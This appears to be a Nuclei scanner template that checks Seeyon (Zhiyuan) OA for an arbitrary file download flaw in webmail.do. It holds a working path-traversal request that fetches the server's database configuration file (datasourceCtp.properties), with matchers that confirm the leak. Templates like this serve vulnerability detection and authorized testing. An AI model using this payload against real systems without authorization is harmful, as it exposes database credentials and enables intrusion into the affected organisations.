id: zhiyuan-fileRead

info:
  name: 致远OA webmail.do任意文件下载
  author: str1am
  severity: high
  tags: zhiyuan,fileRead

requests:
  - method: GET
    path:
      - "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "workflow"
          - "ctpDataSource"
        part: body
        condition: and
